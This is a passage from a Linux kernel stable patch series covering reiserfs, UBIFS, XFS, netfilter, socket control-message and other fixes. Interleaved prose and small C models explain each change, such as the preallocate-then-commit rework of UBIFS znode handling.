+-	if (strlen(sec->name) < sizeof(XATTR_SECURITY_PREFIX))
++
++	if (XATTR_SECURITY_PREFIX_LEN + strlen(sec->name) > XATTR_NAME_MAX)
+ 		return -EINVAL;
+ 
+-	error = reiserfs_xattr_set_handle(th, inode, sec->name, sec->value,
++	strlcat(xattr_name, sec->name, sizeof(xattr_name));
++
++	error = reiserfs_xattr_set_handle(th, inode, xattr_name, sec->value,
+ 					  sec->length, XATTR_CREATE);
+ 	if (error == -ENODATA || error == -EOPNOTSUPP)
+ 		error = 0;
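
The reiserfs_security_write() fix above addresses the name handling:
the LSM hands the filesystem a bare suffix in sec->name, so the real
on-disk attribute name is the "security." prefix plus that suffix, and
the length check has to bound the combined string rather than the
suffix alone. A userspace model of the construction:

	#include <stdio.h>
	#include <string.h>

	#define XATTR_NAME_MAX		255	/* as in the uapi limits */
	#define XATTR_SECURITY_PREFIX	"security."
	#define XATTR_SECURITY_PREFIX_LEN (sizeof(XATTR_SECURITY_PREFIX) - 1)

	static int build_security_xattr_name(const char *suffix,
					     char out[XATTR_NAME_MAX + 1])
	{
		if (XATTR_SECURITY_PREFIX_LEN + strlen(suffix) > XATTR_NAME_MAX)
			return -1;		/* -EINVAL in the kernel */
		strcpy(out, XATTR_SECURITY_PREFIX);
		strcat(out, suffix);		/* strlcat() in the kernel */
		return 0;
	}

	int main(void)
	{
		char name[XATTR_NAME_MAX + 1];

		if (!build_security_xattr_name("selinux", name))
			printf("%s\n", name);	/* security.selinux */
		return 0;
	}
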
+diff --git a/fs/ubifs/dir.c b/fs/ubifs/dir.c
+index 5e6bcce94e641..66ba57a139d2a 100644
+--- a/fs/ubifs/dir.c
++++ b/fs/ubifs/dir.c
+@@ -358,7 +358,6 @@ static struct inode *create_whiteout(struct inode *dir, struct dentry *dentry)
+ 	umode_t mode = S_IFCHR | WHITEOUT_MODE;
+ 	struct inode *inode;
+ 	struct ubifs_info *c = dir->i_sb->s_fs_info;
+-	struct fscrypt_name nm;
+ 
+ 	/*
+ 	 * Create an inode('nlink = 1') for whiteout without updating journal,
+@@ -369,10 +368,6 @@ static struct inode *create_whiteout(struct inode *dir, struct dentry *dentry)
+ 	dbg_gen("dent '%pd', mode %#hx in dir ino %lu",
+ 		dentry, mode, dir->i_ino);
+ 
+-	err = fscrypt_setup_filename(dir, &dentry->d_name, 0, &nm);
+-	if (err)
+-		return ERR_PTR(err);
+-
+ 	inode = ubifs_new_inode(c, dir, mode, false);
+ 	if (IS_ERR(inode)) {
+ 		err = PTR_ERR(inode);
+@@ -395,7 +390,6 @@ out_inode:
+ 	make_bad_inode(inode);
+ 	iput(inode);
+ out_free:
+-	fscrypt_free_filename(&nm);
+ 	ubifs_err(c, "cannot create whiteout file, error %d", err);
+ 	return ERR_PTR(err);
+ }
+@@ -492,6 +486,7 @@ static int ubifs_tmpfile(struct user_namespace *mnt_userns, struct inode *dir,
+ 	unlock_2_inodes(dir, inode);
+ 
+ 	ubifs_release_budget(c, &req);
++	fscrypt_free_filename(&nm);
+ 
+ 	return finish_open_simple(file, 0);
+ 
+diff --git a/fs/ubifs/tnc.c b/fs/ubifs/tnc.c
+index 2469f72eeaabb..6b7d95b65f4b6 100644
+--- a/fs/ubifs/tnc.c
++++ b/fs/ubifs/tnc.c
+@@ -44,6 +44,33 @@ enum {
+ 	NOT_ON_MEDIA = 3,
+ };
+ 
++static void do_insert_old_idx(struct ubifs_info *c,
++			      struct ubifs_old_idx *old_idx)
++{
++	struct ubifs_old_idx *o;
++	struct rb_node **p, *parent = NULL;
++
++	p = &c->old_idx.rb_node;
++	while (*p) {
++		parent = *p;
++		o = rb_entry(parent, struct ubifs_old_idx, rb);
++		if (old_idx->lnum < o->lnum)
++			p = &(*p)->rb_left;
++		else if (old_idx->lnum > o->lnum)
++			p = &(*p)->rb_right;
++		else if (old_idx->offs < o->offs)
++			p = &(*p)->rb_left;
++		else if (old_idx->offs > o->offs)
++			p = &(*p)->rb_right;
++		else {
++			ubifs_err(c, "old idx added twice!");
++			kfree(old_idx);
++			return;
++		}
++	}
++	rb_link_node(&old_idx->rb, parent, p);
++	rb_insert_color(&old_idx->rb, &c->old_idx);
++}
++
+ /**
+  * insert_old_idx - record an index node obsoleted since the last commit start.
+  * @c: UBIFS file-system description object
+@@ -69,35 +96,15 @@ enum {
+  */
+ static int insert_old_idx(struct ubifs_info *c, int lnum, int offs)
+ {
+-	struct ubifs_old_idx *old_idx, *o;
+-	struct rb_node **p, *parent = NULL;
++	struct ubifs_old_idx *old_idx;
+ 
+ 	old_idx = kmalloc(sizeof(struct ubifs_old_idx), GFP_NOFS);
+ 	if (unlikely(!old_idx))
+ 		return -ENOMEM;
+ 	old_idx->lnum = lnum;
+ 	old_idx->offs = offs;
++	do_insert_old_idx(c, old_idx);
+ 
+-	p = &c->old_idx.rb_node;
+-	while (*p) {
+-		parent = *p;
+-		o = rb_entry(parent, struct ubifs_old_idx, rb);
+-		if (lnum < o->lnum)
+-			p = &(*p)->rb_left;
+-		else if (lnum > o->lnum)
+-			p = &(*p)->rb_right;
+-		else if (offs < o->offs)
+-			p = &(*p)->rb_left;
+-		else if (offs > o->offs)
+-			p = &(*p)->rb_right;
+-		else {
+-			ubifs_err(c, "old idx added twice!");
+-			kfree(old_idx);
+-			return 0;
+-		}
+-	}
+-	rb_link_node(&old_idx->rb, parent, p);
+-	rb_insert_color(&old_idx->rb, &c->old_idx);
+ 	return 0;
+ }
+ 
+@@ -199,23 +206,6 @@ static struct ubifs_znode *copy_znode(struct ubifs_info *c,
+ 	__set_bit(DIRTY_ZNODE, &zn->flags);
+ 	__clear_bit(COW_ZNODE, &zn->flags);
+ 
+-	ubifs_assert(c, !ubifs_zn_obsolete(znode));
+-	__set_bit(OBSOLETE_ZNODE, &znode->flags);
+-
+-	if (znode->level != 0) {
+-		int i;
+-		const int n = zn->child_cnt;
+-
+-		/* The children now have new parent */
+-		for (i = 0; i < n; i++) {
+-			struct ubifs_zbranch *zbr = &zn->zbranch[i];
+-
+-			if (zbr->znode)
+-				zbr->znode->parent = zn;
+-		}
+-	}
+-
+-	atomic_long_inc(&c->dirty_zn_cnt);
+ 	return zn;
+ }
+ 
+@@ -233,6 +223,42 @@ static int add_idx_dirt(struct ubifs_info *c, int lnum, int dirt)
+ 	return ubifs_add_dirt(c, lnum, dirt);
+ }
+ 
++/**
++ * replace_znode - replace old znode with new znode.
++ * @c: UBIFS file-system description object
++ * @new_zn: new znode
++ * @old_zn: old znode
++ * @zbr: the branch of parent znode
++ *
++ * Replace old znode with new znode in TNC.
++ */
++static void replace_znode(struct ubifs_info *c, struct ubifs_znode *new_zn,
++			  struct ubifs_znode *old_zn, struct ubifs_zbranch *zbr)
++{
++	ubifs_assert(c, !ubifs_zn_obsolete(old_zn));
++	__set_bit(OBSOLETE_ZNODE, &old_zn->flags);
++
++	if (old_zn->level != 0) {
++		int i;
++		const int n = new_zn->child_cnt;
++
++		/* The children now have new parent */
++		for (i = 0; i < n; i++) {
++			struct ubifs_zbranch *child = &new_zn->zbranch[i];
++
++			if (child->znode)
++				child->znode->parent = new_zn;
++		}
++	}
++
++	zbr->znode = new_zn;
++	zbr->lnum = 0;
++	zbr->offs = 0;
++	zbr->len = 0;
++
++	atomic_long_inc(&c->dirty_zn_cnt);
++}
++
+ /**
+  * dirty_cow_znode - ensure a znode is not being committed.
+  * @c: UBIFS file-system description object
+@@ -265,28 +291,32 @@ static struct ubifs_znode *dirty_cow_znode(struct ubifs_info *c,
+ 		return zn;
+ 
+ 	if (zbr->len) {
+-		err = insert_old_idx(c, zbr->lnum, zbr->offs);
+-		if (unlikely(err))
+-			/*
+-			 * Obsolete znodes will be freed by tnc_destroy_cnext()
+-			 * or free_obsolete_znodes(), copied up znodes should
+-			 * be added back to tnc and freed by
+-			 * ubifs_destroy_tnc_subtree().
+-			 */
++		struct ubifs_old_idx *old_idx;
++
++		old_idx = kmalloc(sizeof(struct ubifs_old_idx), GFP_NOFS);
++		if (unlikely(!old_idx)) {
++			err = -ENOMEM;
+ 			goto out;
++		}
++		old_idx->lnum = zbr->lnum;
++		old_idx->offs = zbr->offs;
++
+ 		err = add_idx_dirt(c, zbr->lnum, zbr->len);
+-	} else
+-		err = 0;
++		if (err) {
++			kfree(old_idx);
++			goto out;
++		}
+ 
+-out:
+-	zbr->znode = zn;
+-	zbr->lnum = 0;
+-	zbr->offs = 0;
+-	zbr->len = 0;
++		do_insert_old_idx(c, old_idx);
++	}
++
++	replace_znode(c, zn, znode, zbr);
+ 
+-	if (unlikely(err))
+-		return ERR_PTR(err);
+ 	return zn;
++
++out:
++	kfree(zn);
++	return ERR_PTR(err);
+ }
+ 
+ /**
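
The dirty_cow_znode() rework above follows a preallocate-then-commit
discipline: the old_idx record is allocated and the dirty-space
accounting performed while failure can still be handled cleanly, and
only then do do_insert_old_idx() and replace_znode(), neither of which
can fail, mutate shared TNC state. That eliminates the half-applied
zbranch update the old out: path could leave behind. The shape of the
pattern in plain C:

	#include <stdlib.h>

	struct record { int payload; };
	static int fallible_accounting(void) { return 0; }
	static void commit(struct record *r) { (void)r; }	/* cannot fail */

	static int update(void)
	{
		struct record *r;

		/* Phase 1: everything that can fail; nothing shared touched. */
		r = malloc(sizeof(*r));
		if (!r)
			return -1;
		if (fallible_accounting()) {
			free(r);	/* unwind is trivial: nothing */
			return -1;	/* has been published yet     */
		}

		/* Phase 2: infallible mutation of shared state. */
		commit(r);
		return 0;
	}

	int main(void) { return update(); }
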
+diff --git a/fs/xfs/libxfs/xfs_sb.c b/fs/xfs/libxfs/xfs_sb.c
+index a20cade590e9f..b6a584e044be0 100644
+--- a/fs/xfs/libxfs/xfs_sb.c
++++ b/fs/xfs/libxfs/xfs_sb.c
+@@ -72,7 +72,8 @@ xfs_sb_validate_v5_features(
+ }
+ 
+ /*
+- * We support all XFS versions newer than a v4 superblock with V2 directories.
++ * We currently support XFS v5 formats with known features and v4 superblocks with
++ * at least V2 directories.
+  */
+ bool
+ xfs_sb_good_version(
+@@ -86,16 +87,16 @@ xfs_sb_good_version(
+ 	if (xfs_sb_is_v5(sbp))
+ 		return xfs_sb_validate_v5_features(sbp);
+ 
++	/* versions prior to v4 are not supported */
++	if (XFS_SB_VERSION_NUM(sbp) != XFS_SB_VERSION_4)
++		return false;
++
+ 	/* We must not have any unknown v4 feature bits set */
+ 	if ((sbp->sb_versionnum & ~XFS_SB_VERSION_OKBITS) ||
+ 	    ((sbp->sb_versionnum & XFS_SB_VERSION_MOREBITSBIT) &&
+ 	     (sbp->sb_features2 & ~XFS_SB_VERSION2_OKBITS)))
+ 		return false;
+ 
+-	/* versions prior to v4 are not supported */
+-	if (XFS_SB_VERSION_NUM(sbp) < XFS_SB_VERSION_4)
+-		return false;
+-
+ 	/* V4 filesystems need v2 directories and unwritten extents */
+ 	if (!(sbp->sb_versionnum & XFS_SB_VERSION_DIRV2BIT))
+ 		return false;
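
The xfs_sb_good_version() reorder above makes the checks strictly
narrowing: v5 superblocks are handled first, anything that is not
exactly version 4 is rejected next, and only then are the v4-only
feature bitmasks consulted, since those bits mean nothing on other
versions (note the old code also compared with "<" where equality is
what is really meant). A boiled-down model, with an illustrative mask:

	#include <stdbool.h>
	#include <stdint.h>

	#define V4		4u
	#define V5		5u
	#define V4_OKBITS	0x0fffu	/* illustrative, not the real mask */

	static bool v5_features_ok(uint16_t feat) { (void)feat; return true; }

	static bool good_version(unsigned int vers, uint16_t versionnum)
	{
		if (vers == V5)
			return v5_features_ok(versionnum);
		if (vers != V4)		/* reject v1-v3 before reading */
			return false;	/* v4-only feature bits        */
		return !(versionnum & ~V4_OKBITS);
	}

	int main(void) { return good_version(V4, 0x0fff) ? 0 : 1; }
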
+diff --git a/include/asm-generic/io.h b/include/asm-generic/io.h
+index a68f8fbf423be..cde032f86856e 100644
+--- a/include/asm-generic/io.h
++++ b/include/asm-generic/io.h
+@@ -236,7 +236,7 @@ static inline u64 readq(const volatile void __iomem *addr)
+ 
+ 	log_read_mmio(64, addr, _THIS_IP_);
+ 	__io_br();
+-	val = __le64_to_cpu(__raw_readq(addr));
++	val = __le64_to_cpu((__le64 __force)__raw_readq(addr));
+ 	__io_ar(val);
+ 	log_post_read_mmio(val, 64, addr, _THIS_IP_);
+ 	return val;
+@@ -287,7 +287,7 @@ static inline void writeq(u64 value, volatile void __iomem *addr)
+ {
+ 	log_write_mmio(value, 64, addr, _THIS_IP_);
+ 	__io_bw();
+-	__raw_writeq(__cpu_to_le64(value), addr);
++	__raw_writeq((u64 __force)__cpu_to_le64(value), addr);
+ 	__io_aw();
+ 	log_post_write_mmio(value, 64, addr, _THIS_IP_);
+ }
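
The readq()/writeq() hunks above change no behaviour; they are sparse
annotations. __raw_readq() returns a plain u64 that actually holds
little-endian data, and the (__le64 __force) cast tells sparse that
reinterpreting it as a __bitwise endian-typed value is intentional
(symmetrically, (u64 __force) on the write side). Under a regular
compiler the annotations compile away, as this stripped-down model of
the kernel's arrangement shows (byte swapping omitted, so it assumes a
little-endian host):

	#include <stdint.h>

	#ifdef __CHECKER__	/* defined only during a sparse run */
	#define __bitwise __attribute__((bitwise))
	#define __force   __attribute__((force))
	#else
	#define __bitwise
	#define __force
	#endif

	typedef uint64_t __bitwise le64;	/* distinct type for sparse */

	static uint64_t le64_to_cpu_model(le64 v)
	{
		return (uint64_t __force)v;
	}

	int main(void)
	{
		le64 v = (le64 __force)42;	/* deliberate reinterpretation */
		return le64_to_cpu_model(v) == 42 ? 0 : 1;
	}
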
+diff --git a/include/drm/i915_pciids.h b/include/drm/i915_pciids.h
+index 4a4c190f76984..8f648c32a9657 100644
+--- a/include/drm/i915_pciids.h
++++ b/include/drm/i915_pciids.h
+@@ -706,7 +706,6 @@
+ 	INTEL_VGA_DEVICE(0x5693, info), \
+ 	INTEL_VGA_DEVICE(0x5694, info), \
+ 	INTEL_VGA_DEVICE(0x5695, info), \
+-	INTEL_VGA_DEVICE(0x5698, info), \
+ 	INTEL_VGA_DEVICE(0x56A5, info), \
+ 	INTEL_VGA_DEVICE(0x56A6, info), \
+ 	INTEL_VGA_DEVICE(0x56B0, info), \
+diff --git a/include/linux/blk-crypto-profile.h b/include/linux/blk-crypto-profile.h
+index bbab65bd54288..e6802b69cdd64 100644
+--- a/include/linux/blk-crypto-profile.h
++++ b/include/linux/blk-crypto-profile.h
+@@ -138,18 +138,6 @@ int devm_blk_crypto_profile_init(struct device *dev,
+ 
+ unsigned int blk_crypto_keyslot_index(struct blk_crypto_keyslot *slot);
+ 
+-blk_status_t blk_crypto_get_keyslot(struct blk_crypto_profile *profile,
+-				    const struct blk_crypto_key *key,
+-				    struct blk_crypto_keyslot **slot_ptr);
+-
+-void blk_crypto_put_keyslot(struct blk_crypto_keyslot *slot);
+-
+-bool __blk_crypto_cfg_supported(struct blk_crypto_profile *profile,
+-				const struct blk_crypto_config *cfg);
+-
+-int __blk_crypto_evict_key(struct blk_crypto_profile *profile,
+-			   const struct blk_crypto_key *key);
+-
+ void blk_crypto_reprogram_all_keys(struct blk_crypto_profile *profile);
+ 
+ void blk_crypto_profile_destroy(struct blk_crypto_profile *profile);
+diff --git a/include/linux/blk-crypto.h b/include/linux/blk-crypto.h
+index 69b24fe92cbf1..ad17eaa192fbb 100644
+--- a/include/linux/blk-crypto.h
++++ b/include/linux/blk-crypto.h
+@@ -71,9 +71,6 @@ struct bio_crypt_ctx {
+ #include <linux/blk_types.h>
+ #include <linux/blkdev.h>
+ 
+-struct request;
+-struct request_queue;
+-
+ #ifdef CONFIG_BLK_INLINE_ENCRYPTION
+ 
+ static inline bool bio_has_crypt_ctx(struct bio *bio)
+@@ -94,13 +91,15 @@ int blk_crypto_init_key(struct blk_crypto_key *blk_key, const u8 *raw_key,
+ 			unsigned int dun_bytes,
+ 			unsigned int data_unit_size);
+ 
+-int blk_crypto_start_using_key(const struct blk_crypto_key *key,
+-			       struct request_queue *q);
++int blk_crypto_start_using_key(struct block_device *bdev,
++			       const struct blk_crypto_key *key);
+ 
+-int blk_crypto_evict_key(struct request_queue *q,
+-			 const struct blk_crypto_key *key);
++void blk_crypto_evict_key(struct block_device *bdev,
++			  const struct blk_crypto_key *key);
+ 
+-bool blk_crypto_config_supported(struct request_queue *q,
++bool blk_crypto_config_supported_natively(struct block_device *bdev,
++					  const struct blk_crypto_config *cfg);
++bool blk_crypto_config_supported(struct block_device *bdev,
+ 				 const struct blk_crypto_config *cfg);
+ 
+ #else /* CONFIG_BLK_INLINE_ENCRYPTION */
+diff --git a/include/linux/mailbox/zynqmp-ipi-message.h b/include/linux/mailbox/zynqmp-ipi-message.h
+index 35ce84c8ca02c..31d8046d945e7 100644
+--- a/include/linux/mailbox/zynqmp-ipi-message.h
++++ b/include/linux/mailbox/zynqmp-ipi-message.h
+@@ -9,7 +9,7 @@
+  * @data: message payload
+  *
+  * This is the structure for data used in mbox_send_message
+- * the maximum length of data buffer is fixed to 12 bytes.
++ * the maximum length of data buffer is fixed to 32 bytes.
+  * Client is supposed to be aware of this.
+  */
+ struct zynqmp_ipi_message {
+diff --git a/include/linux/mlx5/mlx5_ifc.h b/include/linux/mlx5/mlx5_ifc.h
+index e45bdec73baf1..097cbf84c1e05 100644
+--- a/include/linux/mlx5/mlx5_ifc.h
++++ b/include/linux/mlx5/mlx5_ifc.h
+@@ -9063,7 +9063,8 @@ struct mlx5_ifc_alloc_flow_counter_in_bits {
+ 	u8         reserved_at_20[0x10];
+ 	u8         op_mod[0x10];
+ 
+-	u8         reserved_at_40[0x38];
++	u8         reserved_at_40[0x33];
++	u8         flow_counter_bulk_log_size[0x5];
+ 	u8         flow_counter_bulk[0x8];
+ };
+ 
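
The mlx5_ifc change above carves a 5-bit flow_counter_bulk_log_size
field out of the reserved area without disturbing anything behind it:
in these structs each u8 array length is a bit count (an mlx5_ifc
convention), and the widths still sum to the same 64 bits, since
0x33 + 0x5 + 0x8 = 0x40. Because the structs describe firmware command
layouts bit-for-bit, a compile-time width check is a cheap guard:

	#include <assert.h>

	/* Widths taken from the hunk above; the second 64-bit word of
	 * alloc_flow_counter_in must keep its size across the re-split. */
	static_assert(0x33 + 0x5 + 0x8 == 0x40,
		      "bits 0x40..0x7f of alloc_flow_counter_in must stay 64 wide");

	int main(void) { return 0; }
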
+diff --git a/include/linux/netfilter/nfnetlink.h b/include/linux/netfilter/nfnetlink.h
+index 241e005f290ad..e9a9ab34a7ccc 100644
+--- a/include/linux/netfilter/nfnetlink.h
++++ b/include/linux/netfilter/nfnetlink.h
+@@ -45,7 +45,6 @@ struct nfnetlink_subsystem {
+ 	int (*commit)(struct net *net, struct sk_buff *skb);
+ 	int (*abort)(struct net *net, struct sk_buff *skb,
+ 		     enum nfnl_abort_action action);
+-	void (*cleanup)(struct net *net);
+ 	bool (*valid_genid)(struct net *net, u32 genid);
+ };
+ 
+diff --git a/include/linux/posix-timers.h b/include/linux/posix-timers.h
+index 2c6e99ca48afc..d607f51404fca 100644
+--- a/include/linux/posix-timers.h
++++ b/include/linux/posix-timers.h
+@@ -4,6 +4,7 @@
+ 
+ #include <linux/spinlock.h>
+ #include <linux/list.h>
++#include <linux/mutex.h>
+ #include <linux/alarmtimer.h>
+ #include <linux/timerqueue.h>
+ 
+@@ -62,16 +63,18 @@ static inline int clockid_to_fd(const clockid_t clk)
+  * cpu_timer - Posix CPU timer representation for k_itimer
+  * @node:	timerqueue node to queue in the task/sig
+  * @head:	timerqueue head on which this timer is queued
+- * @task:	Pointer to target task
++ * @pid:	Pointer to target task PID
+  * @elist:	List head for the expiry list
+  * @firing:	Timer is currently firing
++ * @handling:	Pointer to the task which handles expiry
+  */
+ struct cpu_timer {
+-	struct timerqueue_node	node;
+-	struct timerqueue_head	*head;
+-	struct pid		*pid;
+-	struct list_head	elist;
+-	int			firing;
++	struct timerqueue_node		node;
++	struct timerqueue_head		*head;
++	struct pid			*pid;
++	struct list_head		elist;
++	int				firing;
++	struct task_struct __rcu	*handling;
+ };
+ 
+ static inline bool cpu_timer_enqueue(struct timerqueue_head *head,
+@@ -135,10 +138,12 @@ struct posix_cputimers {
+ /**
+  * posix_cputimers_work - Container for task work based posix CPU timer expiry
+  * @work:	The task work to be scheduled
++ * @mutex:	Mutex held around expiry in context of this task work
+  * @scheduled:  @work has been scheduled already, no further processing
+  */
+ struct posix_cputimers_work {
+ 	struct callback_head	work;
++	struct mutex		mutex;
+ 	unsigned int		scheduled;
+ };
+ 
+diff --git a/include/linux/sunrpc/sched.h b/include/linux/sunrpc/sched.h
+index b8ca3ecaf8d76..8ada7dc802d30 100644
+--- a/include/linux/sunrpc/sched.h
++++ b/include/linux/sunrpc/sched.h
+@@ -90,8 +90,7 @@ struct rpc_task {
+ #endif
+ 	unsigned char		tk_priority : 2,/* Task priority */
+ 				tk_garb_retry : 2,
+-				tk_cred_retry : 2,
+-				tk_rebind_retry : 2;
++				tk_cred_retry : 2;
+ };
+ 
+ typedef void			(*rpc_action)(struct rpc_task *);
+diff --git a/include/linux/tick.h b/include/linux/tick.h
+index bfd571f18cfdc..9459fef5b8573 100644
+--- a/include/linux/tick.h
++++ b/include/linux/tick.h
+@@ -216,6 +216,7 @@ extern void tick_nohz_dep_set_signal(struct task_struct *tsk,
+ 				     enum tick_dep_bits bit);
+ extern void tick_nohz_dep_clear_signal(struct signal_struct *signal,
+ 				       enum tick_dep_bits bit);
++extern bool tick_nohz_cpu_hotpluggable(unsigned int cpu);
+ 
+ /*
+  * The below are tick_nohz_[set,clear]_dep() wrappers that optimize off-cases
+@@ -280,6 +281,7 @@ static inline void tick_nohz_full_add_cpus_to(struct cpumask *mask) { }
+ 
+ static inline void tick_nohz_dep_set_cpu(int cpu, enum tick_dep_bits bit) { }
+ static inline void tick_nohz_dep_clear_cpu(int cpu, enum tick_dep_bits bit) { }
++static inline bool tick_nohz_cpu_hotpluggable(unsigned int cpu) { return true; }
+ 
+ static inline void tick_dep_set(enum tick_dep_bits bit) { }
+ static inline void tick_dep_clear(enum tick_dep_bits bit) { }
+diff --git a/include/linux/vt_buffer.h b/include/linux/vt_buffer.h
+index 848db1b1569ff..919d999a8c1db 100644
+--- a/include/linux/vt_buffer.h
++++ b/include/linux/vt_buffer.h
+@@ -16,7 +16,7 @@
+ 
+ #include <linux/string.h>
+ 
+-#if defined(CONFIG_VGA_CONSOLE) || defined(CONFIG_MDA_CONSOLE)
++#if IS_ENABLED(CONFIG_VGA_CONSOLE) || IS_ENABLED(CONFIG_MDA_CONSOLE)
+ #include <asm/vga.h>
+ #endif
+ 
+diff --git a/include/net/bond_alb.h b/include/net/bond_alb.h
+index 191c36afa1f4a..9dc082b2d5430 100644
+--- a/include/net/bond_alb.h
++++ b/include/net/bond_alb.h
+@@ -156,8 +156,8 @@ int bond_alb_init_slave(struct bonding *bond, struct slave *slave);
+ void bond_alb_deinit_slave(struct bonding *bond, struct slave *slave);
+ void bond_alb_handle_link_change(struct bonding *bond, struct slave *slave, char link);
+ void bond_alb_handle_active_change(struct bonding *bond, struct slave *new_slave);
+-int bond_alb_xmit(struct sk_buff *skb, struct net_device *bond_dev);
+-int bond_tlb_xmit(struct sk_buff *skb, struct net_device *bond_dev);
++netdev_tx_t bond_alb_xmit(struct sk_buff *skb, struct net_device *bond_dev);
++netdev_tx_t bond_tlb_xmit(struct sk_buff *skb, struct net_device *bond_dev);
+ struct slave *bond_xmit_alb_slave_get(struct bonding *bond,
+ 				      struct sk_buff *skb);
+ struct slave *bond_xmit_tlb_slave_get(struct bonding *bond,
+diff --git a/include/net/netfilter/nf_conntrack_core.h b/include/net/netfilter/nf_conntrack_core.h
+index b2b9de70d9f4d..a36f87af415c2 100644
+--- a/include/net/netfilter/nf_conntrack_core.h
++++ b/include/net/netfilter/nf_conntrack_core.h
+@@ -90,7 +90,11 @@ static inline void __nf_ct_set_timeout(struct nf_conn *ct, u64 timeout)
+ {
+ 	if (timeout > INT_MAX)
+ 		timeout = INT_MAX;
+-	WRITE_ONCE(ct->timeout, nfct_time_stamp + (u32)timeout);
++
++	if (nf_ct_is_confirmed(ct))
++		WRITE_ONCE(ct->timeout, nfct_time_stamp + (u32)timeout);
++	else
++		ct->timeout = (u32)timeout;
+ }
+ 
+ int __nf_ct_change_timeout(struct nf_conn *ct, u64 cta_timeout);
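
The __nf_ct_set_timeout() change above reflects the two meanings of
ct->timeout across a conntrack entry's life: an unconfirmed entry is
still private to the allocating context and stores the relative
interval (the timestamp is added when the entry is confirmed), while a
confirmed entry stores an absolute deadline and is updated through
WRITE_ONCE() so lockless readers never see a torn value. A minimal
model of the idiom, assuming GNU C for __typeof__:

	#include <stdbool.h>

	#define WRITE_ONCE_MODEL(x, val) \
		(*(volatile __typeof__(x) *)&(x) = (val))

	struct ct_model {
		unsigned int timeout;	/* interval until confirmed,
					 * then an absolute deadline */
		bool confirmed;
	};

	static void set_timeout(struct ct_model *ct, unsigned int now,
				unsigned int interval)
	{
		if (ct->confirmed)
			/* published: untorn store of an absolute deadline */
			WRITE_ONCE_MODEL(ct->timeout, now + interval);
		else
			/* private: keep the raw interval for confirmation */
			ct->timeout = interval;
	}

	int main(void)
	{
		struct ct_model ct = { .timeout = 0, .confirmed = false };

		set_timeout(&ct, 1000, 600);	/* stores 600 */
		ct.confirmed = true;
		set_timeout(&ct, 1000, 600);	/* stores 1600 */
		return ct.timeout == 1600 ? 0 : 1;
	}
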
+diff --git a/include/net/netfilter/nf_tables.h b/include/net/netfilter/nf_tables.h
+index 6bacbf57ac175..a1ccf1276f3ee 100644
+--- a/include/net/netfilter/nf_tables.h
++++ b/include/net/netfilter/nf_tables.h
+@@ -614,6 +614,7 @@ struct nft_set_binding {
+ };
+ 
+ enum nft_trans_phase;
++void nf_tables_activate_set(const struct nft_ctx *ctx, struct nft_set *set);
+ void nf_tables_deactivate_set(const struct nft_ctx *ctx, struct nft_set *set,
+ 			      struct nft_set_binding *binding,
+ 			      enum nft_trans_phase phase);
+diff --git a/include/net/scm.h b/include/net/scm.h
+index 1ce365f4c2560..585adc1346bd0 100644
+--- a/include/net/scm.h
++++ b/include/net/scm.h
+@@ -105,16 +105,27 @@ static inline void scm_passec(struct socket *sock, struct msghdr *msg, struct sc
+ 		}
+ 	}
+ }
++
++static inline bool scm_has_secdata(struct socket *sock)
++{
++	return test_bit(SOCK_PASSSEC, &sock->flags);
++}
+ #else
+ static inline void scm_passec(struct socket *sock, struct msghdr *msg, struct scm_cookie *scm)
+ { }
++
++static inline bool scm_has_secdata(struct socket *sock)
++{
++	return false;
++}
+ #endif /* CONFIG_SECURITY_NETWORK */
+ 
+ static __inline__ void scm_recv(struct socket *sock, struct msghdr *msg,
+ 				struct scm_cookie *scm, int flags)
+ {
+ 	if (!msg->msg_control) {
+-		if (test_bit(SOCK_PASSCRED, &sock->flags) || scm->fp)
++		if (test_bit(SOCK_PASSCRED, &sock->flags) || scm->fp ||
++		    scm_has_secdata(sock))
+ 			msg->msg_flags |= MSG_CTRUNC;
+ 		scm_destroy(scm);
+ 		return;
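
The scm_recv() change above fixes a silent drop: when the receiver
supplied no control buffer, the old code raised MSG_CTRUNC only for
credentials or passed file descriptors, so pending LSM security data
disappeared without any truncation signal. scm_has_secdata() folds that
third source into the check and compiles to false when
CONFIG_SECURITY_NETWORK is off. The predicate in isolation:

	#include <stdbool.h>

	/* Control data was truncated if the caller gave us nowhere to
	 * put it while any ancillary payload was pending. */
	static bool ctl_truncated(bool have_ctl_buf, bool passcred,
				  bool have_fds, bool have_secdata)
	{
		return !have_ctl_buf && (passcred || have_fds || have_secdata);
	}

	int main(void)
	{
		return ctl_truncated(false, false, false, true) ? 0 : 1;
	}
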
+diff --git a/include/net/xsk_buff_pool.h b/include/net/xsk_buff_pool.h
+index f787c3f524b03..996eaf1ef1a1d 100644
+--- a/include/net/xsk_buff_pool.h
++++ b/include/net/xsk_buff_pool.h
+@@ -175,13 +175,8 @@ static inline bool xp_desc_crosses_non_contig_pg(struct xsk_buff_pool *pool,
+ 	if (likely(!cross_pg))
+ 		return false;
+ 
+-	if (pool->dma_pages_cnt) {
+-		return !(pool->dma_pages[addr >> PAGE_SHIFT] &
+-			 XSK_NEXT_PG_CONTIG_MASK);
+-	}
+-
+-	/* skb path */
+-	return addr + len > pool->addrs_cnt;
++	return pool->dma_pages_cnt &&
++	       !(pool->dma_pages[addr >> PAGE_SHIFT] & XSK_NEXT_PG_CONTIG_MASK);
+ }
+ 
+ static inline u64 xp_aligned_extract_addr(struct xsk_buff_pool *pool, u64 addr)
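
After the change above, xp_desc_crosses_non_contig_pg() consults only
the DMA page map: on the skb (copy) path dma_pages_cnt is zero, so a
page-crossing buffer is simply allowed, the out-of-bounds case being
rejected during descriptor validation instead per the corresponding
upstream fix. The cross_pg test feeding this helper is plain page
arithmetic:

	#include <stdbool.h>
	#include <stdint.h>

	#define PAGE_SIZE_MODEL 4096u

	/* True if [addr, addr + len) straddles a page boundary. */
	static bool crosses_page(uint64_t addr, uint32_t len)
	{
		return (addr & (PAGE_SIZE_MODEL - 1)) + len > PAGE_SIZE_MODEL;
	}

	int main(void)
	{
		return crosses_page(4090, 10) ? 0 : 1;	/* 4100 > 4096 */
	}
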
+diff --git a/include/scsi/sas_ata.h b/include/scsi/sas_ata.h
+index ec646217e7f6e..e7d466df81576 100644
+--- a/include/scsi/sas_ata.h
++++ b/include/scsi/sas_ata.h
+@@ -32,6 +32,7 @@ void sas_probe_sata(struct asd_sas_port *port);
+ void sas_suspend_sata(struct asd_sas_port *port);
+ void sas_resume_sata(struct asd_sas_port *port);
+ void sas_ata_end_eh(struct ata_port *ap);
++void sas_ata_device_link_abort(struct domain_device *dev, bool force_reset);
+ int sas_execute_ata_cmd(struct domain_device *device, u8 *fis,
+ 			int force_phy_id);
+ int sas_ata_wait_after_reset(struct domain_device *dev, unsigned long deadline);
